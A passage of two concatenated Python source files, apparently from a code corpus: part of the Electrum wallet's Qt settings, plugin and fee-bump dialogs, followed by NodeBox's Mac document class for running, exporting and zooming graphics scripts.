rbf_cb = QCheckBox(_('Enable Replace-By-Fee'))
rbf_cb.setChecked(use_rbf)
def on_rbf(x):
rbf_result = x == Qt.Checked
self.config.set_key('use_rbf', rbf_result)
self.rbf_checkbox.setVisible(rbf_result)
self.rbf_checkbox.setChecked(False)
rbf_cb.stateChanged.connect(on_rbf)
rbf_cb.setToolTip(_('Enable RBF'))
fee_widgets.append((rbf_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(id_widgets, _('Identity')),
]
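# Each preferences tab is a two-column grid: (label, widget) pairs put the
# label in column 0 and the control in column 1, while entries whose second
# element is None (standalone checkboxes) span the full row.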
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
self.disconnect(self, SIGNAL('alias_received'), set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def run_network_dialog(self):
if not self.network:
self.show_warning(_('You are using Electrum in offline mode; restart Electrum if you want to get connected'), title=_('Offline'))
return
NetworkDialog(self.wallet.network, self.config, self).do_exec()
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
cb.setEnabled(plugins.is_available(name, self.wallet))
cb.setChecked(p is not None and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(i+1,1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
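# Fee bumping (RBF): the user enters a new fee that must not be lower than the
# current one; the difference is passed to wallet.bump_fee(), and ticking
# 'Final' sets the replacement's sequence to 0xffffffff so it cannot be
# replaced again.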
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New Fee') + ': '))
e = BTCAmountEdit(self.get_decimal_point)
e.setAmount(fee *1.5)
vbox.addWidget(e)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_sequence(0xffffffff)
self.show_transaction(new_tx)
|
__init__.py
|
import sys
import os
import traceback, linecache
import re
import objc
import time
import random
from Foundation import *
from AppKit import *
from threading import Thread
from nodebox.gui.mac.ValueLadder import MAGICVAR
from nodebox.gui.mac import PyDETextView
from nodebox.gui.mac.util import errorAlert
from nodebox import util
from nodebox import graphics
# AppleScript enumerator codes for PDF and Quicktime export
PDF = 0x70646678 # 'pdfx'
QUICKTIME = 0x71747878 # 'qt '
VERY_LIGHT_GRAY = NSColor.blackColor().blendedColorWithFraction_ofColor_(0.95, NSColor.whiteColor())
DARKER_GRAY = NSColor.blackColor().blendedColorWithFraction_ofColor_(0.8, NSColor.whiteColor())
from nodebox.gui.mac.dashboard import *
from nodebox.gui.mac.progressbar import ProgressBarController
class ExportCommand(NSScriptCommand):
pass
class OutputFile(object):
def __init__(self, data, isErr=False):
self.data = data
self.isErr = isErr
def write(self, data):
if isinstance(data, str):
try:
data = unicode(data, "utf_8", "replace")
except UnicodeDecodeError:
data = "XXX " + repr(data)
self.data.append((self.isErr, data))
# class defined in NodeBoxDocument.xib
class NodeBoxDocument(NSDocument):
graphicsView = objc.IBOutlet()
outputView = objc.IBOutlet()
textView = objc.IBOutlet()
window = objc.IBOutlet()
variablesController = objc.IBOutlet()
dashboardController = objc.IBOutlet()
animationSpinner = objc.IBOutlet()
# The ExportImageAccessory adds:
exportImageAccessory = objc.IBOutlet()
exportImageFormat = objc.IBOutlet()
exportImagePageCount = objc.IBOutlet()
# The ExportMovieAccessory adds:
exportMovieAccessory = objc.IBOutlet()
exportMovieFrames = objc.IBOutlet()
exportMovieFps = objc.IBOutlet()
# When the PageCount accessory is loaded, we also add:
pageCount = objc.IBOutlet()
pageCountAccessory = objc.IBOutlet()
# When the ExportSheet is loaded, we also add:
exportSheet = objc.IBOutlet()
exportSheetIndicator = objc.IBOutlet()
path = None
exportDir = None
magicvar = None # Used for value ladders.
_code = None
vars = []
movie = None
def windowNibName(self):
return "NodeBoxDocument"
def init(self):
self = super(NodeBoxDocument, self).init()
nc = NSNotificationCenter.defaultCenter()
nc.addObserver_selector_name_object_(self, "textFontChanged:", "PyDETextFontChanged", None)
self.namespace = {}
self.canvas = graphics.Canvas()
self.context = graphics.Context(self.canvas, self.namespace)
self.animationTimer = None
self.__doc__ = {}
self._pageNumber = 1
self._frame = 150
self.fullScreen = None
self._seed = time.time()
self.currentView = self.graphicsView
return self
def autosavesInPlace(self):
return True
def close(self):
self.stopScript()
super(NodeBoxDocument, self).close()
def __del__(self):
nc = NSNotificationCenter.defaultCenter()
nc.removeObserver_name_object_(self, "PyDETextFontChanged", None)
# text view has a couple of circular refs, it can let go of them now
self.textView._cleanup()
def textFontChanged_(self, notification):
font = PyDETextView.getBasicTextAttributes()[NSFontAttributeName]
self.outputView.setFont_(font)
def readFromFile_ofType_(self, path, tp):
if self.textView is None:
# we're not yet fully loaded
self.path = path
else:
# "revert"
self.readFromUTF8(path)
return True
def writeToFile_ofType_(self, path, tp):
f = file(path, "w")
text = self.textView.string()
f.write(text.encode("utf8"))
f.close()
return True
def windowControllerDidLoadNib_(self, controller):
if self.path:
self.readFromUTF8(self.path)
font = PyDETextView.getBasicTextAttributes()[NSFontAttributeName]
self.outputView.setFont_(font)
self.textView.window().makeFirstResponder_(self.textView)
self.windowControllers()[0].setWindowFrameAutosaveName_("NodeBoxDocumentWindow")
def readFromUTF8(self, path):
f = file(path)
text = unicode(f.read(), "utf_8")
f.close()
self.textView.setString_(text)
self.textView.usesTabs = "\t" in text
def cleanRun(self, fn, newSeed = True, buildInterface=True):
self.animationSpinner.startAnimation_(None)
# Prepare everything for running the script
self.prepareRun()
# Run the actual script
success = self.fastRun(fn, newSeed)
self.animationSpinner.stopAnimation_(None)
if success and buildInterface:
# Build the interface
self.vars = self.namespace["_ctx"]._vars
if len(self.vars) > 0:
self.buildInterface_(None)
return success
def prepareRun(self):
# Compile the script
success, output = self._boxedRun(self._compileScript)
self._flushOutput(output)
if not success:
return False
# Initialize the namespace
self._initNamespace()
# Reset the pagenum
self._pageNumber = 1
# Reset the frame
self._frame = 1
self.speed = self.canvas.speed = None
def fastRun(self, fn, newSeed = False):
# Check if there is code to run
if self._code is None:
return False
# Clear the canvas
self.canvas.clear()
# Generate a new seed, if needed
if newSeed:
self._seed = time.time()
random.seed(self._seed)
# Set the mouse position
window = self.currentView.window()
pt = window.mouseLocationOutsideOfEventStream()
mx, my = window.contentView().convertPoint_toView_(pt, self.currentView)
# Hack: mouse coordinates are flipped vertically in FullscreenView.
# This flips them back.
if isinstance(self.currentView, FullscreenView):
my = self.currentView.bounds()[1][1] - my
if self.fullScreen is None:
mx /= self.currentView.zoom
my /= self.currentView.zoom
self.namespace["MOUSEX"], self.namespace["MOUSEY"] = mx, my
self.namespace["mousedown"] = self.currentView.mousedown
self.namespace["keydown"] = self.currentView.keydown
self.namespace["key"] = self.currentView.key
self.namespace["keycode"] = self.currentView.keycode
self.namespace["scrollwheel"] = self.currentView.scrollwheel
self.namespace["wheeldelta"] = self.currentView.wheeldelta
# Reset the context
self.context._resetContext()
# Initalize the magicvar
self.namespace[MAGICVAR] = self.magicvar
# Set the pagenum
self.namespace['PAGENUM'] = self._pageNumber
# Set the frame
self.namespace['FRAME'] = self._frame
# Run the script
success, output = self._boxedRun(fn)
self._flushOutput(output)
if not success:
return False
# Display the output of the script
self.currentView.setCanvas(self.canvas)
return True
@objc.IBAction
def runFullscreen_(self, sender):
if self.fullScreen is not None: return
self.stopScript()
self.currentView = FullscreenView.alloc().init()
self.currentView.canvas = None
fullRect = NSScreen.mainScreen().frame()
self.fullScreen = FullscreenWindow.alloc().initWithRect_(fullRect)
self.fullScreen.setContentView_(self.currentView)
self.fullScreen.makeKeyAndOrderFront_(self)
self.fullScreen.makeFirstResponder_(self.currentView)
NSMenu.setMenuBarVisible_(False)
NSCursor.hide()
self._runScript()
@objc.IBAction
def runScript_(self, sender):
self.runScript()
def runScript(self, compile=True, newSeed=True):
if self.fullScreen is not None: return
self.currentView = self.graphicsView
self._runScript(compile, newSeed)
def _runScript(self, compile=True, newSeed=True):
if not self.cleanRun(self._execScript):
pass
# Check whether we are dealing with animation
if self.canvas.speed is not None:
if not self.namespace.has_key("draw"):
errorAlert("Not a proper NodeBox animation",
"NodeBox animations should have at least a draw() method.")
return
# Check if animationTimer is already running
if self.animationTimer is not None:
self.stopScript()
self.speed = self.canvas.speed
# Run setup routine
if self.namespace.has_key("setup"):
self.fastRun(self.namespace["setup"])
window = self.currentView.window()
window.makeFirstResponder_(self.currentView)
# Start the timer
self.animationTimer = NSTimer.scheduledTimerWithTimeInterval_target_selector_userInfo_repeats_(
1.0 / self.speed, self, objc.selector(self.doFrame, signature="v@:@"), None, True)
# Start the spinner
self.animationSpinner.startAnimation_(None)
def runScriptFast(self):
if self.animationTimer is None:
self.fastRun(self._execScript)
else:
# XXX: This can be sped up. We just run _execScript to get the
# method with __MAGICVAR__ into the namespace, and execute
# that, so it should only be called once for animations.
self.fastRun(self._execScript)
self.fastRun(self.namespace["draw"])
def doFrame(self):
self.fastRun(self.namespace["draw"], newSeed=True)
self._frame += 1
def source(self):
return self.textView.string()
def setSource_(self, source):
self.textView.setString_(source)
@objc.IBAction
def stopScript_(self, sender=None):
self.stopScript()
def stopScript(self):
if self.namespace.has_key("stop"):
success, output = self._boxedRun(self.namespace["stop"])
self._flushOutput(output)
self.animationSpinner.stopAnimation_(None)
if self.animationTimer is not None:
self.animationTimer.invalidate()
self.animationTimer = None
if self.fullScreen is not None:
self.currentView = self.graphicsView
self.fullScreen = None
NSMenu.setMenuBarVisible_(True)
NSCursor.unhide()
self.textView.hideValueLadder()
window = self.textView.window()
window.makeFirstResponder_(self.textView)
def _compileScript(self, source=None):
if source is None:
source = self.textView.string()
self._code = None
self._code = compile(source + "\n\n", self.scriptName.encode('ascii', 'ignore'), "exec")
def _initNamespace(self):
self.namespace.clear()
# Add everything from the namespace
for name in graphics.__all__:
self.namespace[name] = getattr(graphics, name)
for name in util.__all__:
self.namespace[name] = getattr(util, name)
# Add everything from the context object
self.namespace["_ctx"] = self.context
for attrName in dir(self.context):
self.namespace[attrName] = getattr(self.context, attrName)
# Add the document global
self.namespace["__doc__"] = self.__doc__
# Add the page number
self.namespace["PAGENUM"] = self._pageNumber
# Add the frame number
self.namespace["FRAME"] = self._frame
# Add the magic var
self.namespace[MAGICVAR] = self.magicvar
# XXX: will be empty after reset.
#for var in self.vars:
# self.namespace[var.name] = var.value
def _execScript(self):
exec self._code in self.namespace
self.__doc__ = self.namespace.get("__doc__", self.__doc__)
def _boxedRun(self, method, args=[]):
"""
Runs the given method in a boxed environment.
Boxed environments:
- Have their current directory set to the directory of the file
- Have their argument set to the filename
- Have their outputs redirect to an output stream.
Returns:
A tuple containing:
- A boolean indicating whether the run was successful
- The OutputFile
"""
self.scriptName = self.fileName()
libDir = os.path.join(os.getenv("HOME"), "Library", "Application Support", "NodeBox")
if not self.scriptName:
curDir = os.getenv("HOME")
self.scriptName = "<untitled>"
else:
curDir = os.path.dirname(self.scriptName)
save = sys.stdout, sys.stderr
saveDir = os.getcwd()
saveArgv = sys.argv
sys.argv = [self.scriptName]
if os.path.exists(libDir):
sys.path.insert(0, libDir)
os.chdir(curDir)
sys.path.insert(0, curDir)
output = []
sys.stdout = OutputFile(output, False)
sys.stderr = OutputFile(output, True)
self._scriptDone = False
try:
if self.animationTimer is None:
pass
# Creating a thread is a heavy operation,
# don't install it when animating, where speed is crucial
#t = Thread(target=self._userCancelledMonitor, name="UserCancelledMonitor")
#t.start()
try:
method(*args)
except KeyboardInterrupt:
self.stopScript()
except:
etype, value, tb = sys.exc_info()
if tb.tb_next is not None:
tb = tb.tb_next # skip the frame doing the exec
traceback.print_exception(etype, value, tb)
etype = value = tb = None
return False, output
finally:
self._scriptDone = True
sys.stdout, sys.stderr = save
os.chdir(saveDir)
sys.path.remove(curDir)
try:
sys.path.remove(libDir)
except ValueError:
pass
sys.argv = saveArgv
#self._flushOutput()
return True, output
# from Mac/Tools/IDE/PyEdit.py
def _userCancelledMonitor(self):
import time
from signal import SIGINT
from Carbon import Evt
while not self._scriptDone:
if Evt.CheckEventQueueForUserCancel():
# Send a SIGINT signal to ourselves.
# This gets delivered to the main thread,
# cancelling the running script.
os.kill(os.getpid(), SIGINT)
break
time.sleep(0.25)
def _flushOutput(self, output):
outAttrs = PyDETextView.getBasicTextAttributes()
errAttrs = outAttrs.copy()
# XXX err color from user defaults...
errAttrs[NSForegroundColorAttributeName] = NSColor.redColor()
outputView = self.outputView
outputView.setSelectedRange_((outputView.textStorage().length(), 0))
lastErr = None
for isErr, data in output:
if isErr != lastErr:
attrs = [outAttrs, errAttrs][isErr]
outputView.setTypingAttributes_(attrs)
lastErr = isErr
outputView.insertText_(data)
# del self.output
@objc.IBAction
def copyImageAsPDF_(self, sender):
pboard = NSPasteboard.generalPasteboard()
# graphicsView implements the pboard delegate method to provide the data
pboard.declareTypes_owner_([NSPDFPboardType,NSPostScriptPboardType,NSTIFFPboardType], self.graphicsView)
@objc.IBAction
def exportAsImage_(self, sender):
exportPanel = NSSavePanel.savePanel()
exportPanel.setRequiredFileType_("pdf")
exportPanel.setNameFieldLabel_("Export To:")
exportPanel.setPrompt_("Export")
exportPanel.setCanSelectHiddenExtension_(True)
if not NSBundle.loadNibNamed_owner_("ExportImageAccessory", self):
NSLog("Error -- could not load ExportImageAccessory.")
self.exportImagePageCount.setIntValue_(1)
exportPanel.setAccessoryView_(self.exportImageAccessory)
path = self.fileName()
if path:
dirName, fileName = os.path.split(path)
fileName, ext = os.path.splitext(fileName)
fileName += ".pdf"
else:
dirName, fileName = None, "Untitled.pdf"
# If a file was already exported, use that folder as the default.
if self.exportDir is not None:
dirName = self.exportDir
exportPanel.beginSheetForDirectory_file_modalForWindow_modalDelegate_didEndSelector_contextInfo_(
dirName, fileName, NSApp().mainWindow(), self,
"exportPanelDidEnd:returnCode:contextInfo:", 0)
def exportPanelDidEnd_returnCode_contextInfo_(self, panel, returnCode, context):
if returnCode:
fname = panel.filename()
self.exportDir = os.path.split(fname)[0] # Save the directory we exported to.
pages = self.exportImagePageCount.intValue()
format = panel.requiredFileType()
panel.close()
self.doExportAsImage(fname, format, pages)
exportPanelDidEnd_returnCode_contextInfo_ = objc.selector(exportPanelDidEnd_returnCode_contextInfo_,
signature="v@:@ii")
@objc.IBAction
def exportImageFormatChanged_(self, sender):
image_formats = ('pdf', 'eps', 'png', 'tiff', 'jpg', 'gif')
panel = sender.window()
panel.setRequiredFileType_(image_formats[sender.indexOfSelectedItem()])
def doExportAsImage(self, fname, format, pages=1):
basename, ext = os.path.splitext(fname)
# When saving one page (the default), just save the current graphics
# context. When generating multiple pages, we run the script again
# (so we don't use the current displayed view) for the first page,
# and then for every next page.
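# Exported file names carry a zero-padded page counter (e.g. "sketch-00003.pdf"):
# "-%5d" formats the number and the padding spaces are then replaced with zeros.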
if pages == 1:
if self.graphicsView.canvas is None:
self.runScript()
self.canvas.save(fname, format)
elif pages > 1:
pb = ProgressBarController.alloc().init()
pb.begin("Generating %s images..." % pages, pages)
try:
if not self.cleanRun(self._execScript): return
self._pageNumber = 1
self._frame = 1
# If the speed is set, we are dealing with animation
if self.canvas.speed is None:
for i in range(pages):
if i > 0: # Run has already happened first time
self.fastRun(self._execScript, newSeed=True)
counterAsString = "-%5d" % self._pageNumber
counterAsString = counterAsString.replace(' ', '0')
exportName = basename + counterAsString + ext
self.canvas.save(exportName, format)
self.graphicsView.setNeedsDisplay_(True)
self._pageNumber += 1
self._frame += 1
pb.inc()
else:
if self.namespace.has_key("setup"):
self.fastRun(self.namespace["setup"])
for i in range(pages):
self.fastRun(self.namespace["draw"], newSeed=True)
counterAsString = "-%5d" % self._pageNumber
counterAsString = counterAsString.replace(' ', '0')
exportName = basename + counterAsString + ext
self.canvas.save(exportName, format)
self.graphicsView.setNeedsDisplay_(True)
self._pageNumber += 1
self._frame += 1
pb.inc()
if self.namespace.has_key("stop"):
success, output = self._boxedRun(self.namespace["stop"])
self._flushOutput(output)
except KeyboardInterrupt:
pass
pb.end()
del pb
self._pageNumber = 1
self._frame = 1
@objc.IBAction
def exportAsMovie_(self, sender):
exportPanel = NSSavePanel.savePanel()
exportPanel.setRequiredFileType_("pdf")
exportPanel.setNameFieldLabel_("Export To:")
exportPanel.setPrompt_("Export")
exportPanel.setCanSelectHiddenExtension_(True)
exportPanel.setAllowedFileTypes_(["mov"])
if not NSBundle.loadNibNamed_owner_("ExportMovieAccessory", self):
NSLog("Error -- could not load ExportMovieAccessory.")
self.exportMovieFrames.setIntValue_(150)
self.exportMovieFps.setIntValue_(30)
exportPanel.setAccessoryView_(self.exportMovieAccessory)
path = self.fileName()
if path:
dirName, fileName = os.path.split(path)
fileName, ext = os.path.splitext(fileName)
fileName += ".mov"
else:
dirName, fileName = None, "Untitled.mov"
# If a file was already exported, use that folder as the default.
if self.exportDir is not None:
dirName = self.exportDir
exportPanel.beginSheetForDirectory_file_modalForWindow_modalDelegate_didEndSelector_contextInfo_(
dirName, fileName, NSApp().mainWindow(), self,
"qtPanelDidEnd:returnCode:contextInfo:", 0)
def qtPanelDidEnd_returnCode_contextInfo_(self, panel, returnCode, context):
if returnCode:
fname = panel.filename()
self.exportDir = os.path.split(fname)[0] # Save the directory we exported to.
frames = self.exportMovieFrames.intValue()
fps = self.exportMovieFps.floatValue()
panel.close()
if frames <= 0 or fps <= 0: return
self.doExportAsMovie(fname, frames, fps)
qtPanelDidEnd_returnCode_contextInfo_ = objc.selector(qtPanelDidEnd_returnCode_contextInfo_,
signature="v@:@ii")
def doExportAsMovie(self, fname, frames=60, fps=30):
# Only load QTSupport when necessary.
# QTSupport loads QTKit, which wants to establish a connection to the window server.
# If we load QTSupport before something is on screen, the connection to the window server
# cannot be established.
from nodebox.util import QTSupport
try:
os.unlink(fname)
except:
pass
try:
fp = open(fname, 'w')
fp.close()
except:
errorAlert("File Error", "Could not create file '%s'. Perhaps it is locked or busy." % fname)
return
movie = None
pb = ProgressBarController.alloc().init()
pb.begin("Generating %s frames..." % frames, frames)
try:
if not self.cleanRun(self._execScript): return
self._pageNumber = 1
self._frame = 1
movie = QTSupport.Movie(fname, fps)
# If the speed is set, we are dealing with animation
if self.canvas.speed is None:
for i in range(frames):
if i > 0: # Run has already happened first time
self.fastRun(self._execScript, newSeed=True)
movie.add(self.canvas)
self.graphicsView.setNeedsDisplay_(True)
pb.inc()
self._pageNumber += 1
self._frame += 1
else:
if self.namespace.has_key("setup"):
self.fastRun(self.namespace["setup"])
for i in range(frames):
self.fastRun(self.namespace["draw"], newSeed=True)
movie.add(self.canvas)
self.graphicsView.setNeedsDisplay_(True)
pb.inc()
self._pageNumber += 1
self._frame += 1
if self.namespace.has_key("stop"):
success, output = self._boxedRun(self.namespace["stop"])
self._flushOutput(output)
except KeyboardInterrupt:
pass
pb.end()
del pb
movie.save()
self._pageNumber = 1
self._frame = 1
@objc.IBAction
def printDocument_(self, sender):
op = NSPrintOperation.printOperationWithView_printInfo_(self.graphicsView, self.printInfo())
op.runOperationModalForWindow_delegate_didRunSelector_contextInfo_(
NSApp().mainWindow(), self, "printOperationDidRun:success:contextInfo:",
0)
def printOperationDidRun_success_contextInfo_(self, op, success, info):
if success:
self.setPrintInfo_(op.printInfo())
printOperationDidRun_success_contextInfo_ = objc.selector(printOperationDidRun_success_contextInfo_,
signature="v@:@ci")
@objc.IBAction
def buildInterface_(self, sender):
self.dashboardController.buildInterface(self.vars)
def validateMenuItem_(self, menuItem):
if menuItem.action() in ("exportAsImage:", "exportAsMovie:"):
return self.canvas is not None
return True
# Zoom commands, forwarding to the graphics view.
@objc.IBAction
def zoomIn_(self, sender):
if self.fullScreen is not None: return
self.graphicsView.zoomIn_(sender)
@objc.IBAction
def zoomOut_(self, sender):
if self.fullScreen is not None: return
self.graphicsView.zoomOut_(sender)
@objc.IBAction
def zoomToTag_(self, sender):
if self.fullScreen is not None: return
self.graphicsView.zoomTo_(sender.tag() / 100.0)
@objc.IBAction
def zoomToFit_(self, sender):
if self.fullScreen is not None: return
self.graphicsView.zoomToFit_(sender)
class FullscreenWindow(NSWindow):
def initWithRect_(self, fullRect):
super(FullscreenWindow, self).initWithContentRect_styleMask_backing_defer_(fullRect, NSBorderlessWindowMask, NSBackingStoreBuffered, True)
return self
def canBecomeKeyWindow(self):
return True
class FullscreenView(NSView):
def init(self):
super(FullscreenView, self).init()
self.mousedown = False
self.keydown = False
self.key = None
self.keycode = None
self.scrollwheel = False
self.wheeldelta = 0.0
return self
def setCanvas(self, canvas):
self.canvas = canvas
self.setNeedsDisplay_(True)
if not hasattr(self, "screenRect"):
self.screenRect = NSScreen.mainScreen().frame()
cw, ch = self.canvas.size
sw, sh = self.screenRect[1]
self.scalingFactor = calc_scaling_factor(cw, ch, sw, sh)
nw, nh = cw * self.scalingFactor, ch * self.scalingFactor
self.scaledSize = nw, nh
self.dx = (sw - nw) / 2.0
self.dy = (sh - nh) / 2.0
def drawRect_(self, rect):
NSGraphicsContext.currentContext().saveGraphicsState()
NSColor.blackColor().set()
NSRectFill(rect)
if self.canvas is not None:
t = NSAffineTransform.transform()
t.translateXBy_yBy_(self.dx, self.dy)
t.scaleBy_(self.scalingFactor)
t.concat()
clip = NSBezierPath.bezierPathWithRect_( ((0, 0), (self.canvas.width, self.canvas.height)) )
clip.addClip()
self.canvas.draw()
NSGraphicsContext.currentContext().restoreGraphicsState()
def isFlipped(self):
return True
def mouseDown_(self, event):
self.mousedown = True
def mouseUp_(self, event):
self.mousedown = False
def keyDown_(self, event):
self.keydown = True
self.key = event.characters()
self.keycode = event.keyCode()
def keyUp_(self, event):
self.keydown = False
self.key = event.characters()
self.keycode = event.keyCode()
def scrollWheel_(self, event):
self.scrollwheel = True
self.wheeldelta = event.deltaY()
def canBecomeKeyView(self):
return True
def acceptsFirstResponder(self):
return True
def calc_scaling_factor(width, height, maxwidth, maxheight):
return min(float(maxwidth) / width, float(maxheight) / height)
class ZoomPanel(NSView):
pass
# class defined in NodeBoxGraphicsView.xib
class NodeBoxGraphicsView(NSView):
document = objc.IBOutlet()
zoomLevel = objc.IBOutlet()
zoomField = objc.IBOutlet()
zoomSlider = objc.IBOutlet()
# The zoom levels are 10%, 25%, 50%, 75%, 100%, 200% and so on up to 2000%.
zoomLevels = [0.1, 0.25, 0.5, 0.75]
zoom = 1.0
while zoom <= 20.0:
zoomLevels.append(zoom)
zoom += 1.0
def awakeFromNib(self):
self.canvas = None
self._dirty = False
self.mousedown = False
self.keydown = False
self.key = None
self.keycode = None
self.scrollwheel = False
self.wheeldelta = 0.0
self._zoom = 1.0
self.setFrameSize_( (graphics.DEFAULT_WIDTH, graphics.DEFAULT_HEIGHT) )
self.setFocusRingType_(NSFocusRingTypeExterior)
if self.superview() is not None:
self.superview().setBackgroundColor_(VERY_LIGHT_GRAY)
def setCanvas(self, canvas):
self.canvas = canvas
if canvas is not None:
w, h = self.canvas.size
self.setFrameSize_([w*self._zoom, h*self._zoom])
self.markDirty()
def _get_zoom(self):
return self._zoom
def _set_zoom(self, zoom):
self._zoom = zoom
self.zoomLevel.setTitle_("%i%%" % (self._zoom * 100.0))
self.zoomSlider.setFloatValue_(self._zoom * 100.0)
self.setCanvas(self.canvas)
zoom = property(_get_zoom, _set_zoom)
@objc.IBAction
def dragZoom_(self, sender):
self.zoom = self.zoomSlider.floatValue() / 100.0
self.setCanvas(self.canvas)
def findNearestZoomIndex(self, zoom):
"""Returns the nearest zoom level, and whether we found a direct, exact
match or a fuzzy match."""
try: # Search for a direct hit first.
idx = self.zoomLevels.index(zoom)
return idx, True
except ValueError: # Can't find the zoom level, try looking at the indexes.
idx = 0
try:
while self.zoomLevels[idx] < zoom:
idx += 1
except IndexError: # Reached the end of the list
idx = len(self.zoomLevels) - 1 # Just return the last index.
return idx, False
@objc.IBAction
def zoomIn_(self, sender):
idx, direct = self.findNearestZoomIndex(self.zoom)
# Direct hits are perfect, but indirect hits require a bit of help.
# Because of the way indirect hits are calculated, they are already
# rounded up to the upper zoom level; this means we don't need to add 1.
if direct:
idx += 1
idx = max(min(idx, len(self.zoomLevels)-1), 0)
self.zoom = self.zoomLevels[idx]
@objc.IBAction
def zoomOut_(self, sender):
idx, direct = self.findNearestZoomIndex(self.zoom)
idx -= 1
idx = max(min(idx, len(self.zoomLevels)-1), 0)
self.zoom = self.zoomLevels[idx]
@objc.IBAction
def resetZoom_(self, sender):
self.zoom = 1.0
def zoomTo_(self, zoom):
self.zoom = zoom
@objc.IBAction
def zoomToFit_(self, sender):
w, h = self.canvas.size
fw, fh = self.superview().frame()[1]
factor = min(fw / w, fh / h)
self.zoom = factor
def markDirty(self, redraw=True):
self._dirty = True
if redraw:
self.setNeedsDisplay_(True)
def setFrameSize_(self, size):
self._image = None
NSView.setFrameSize_(self, size)
def isOpaque(self):
return False
def isFlipped(self):
return True
def drawRect_(self, rect):
if self.canvas is not None:
NSGraphicsContext.currentContext().saveGraphicsState()
try:
if self.zoom != 1.0:
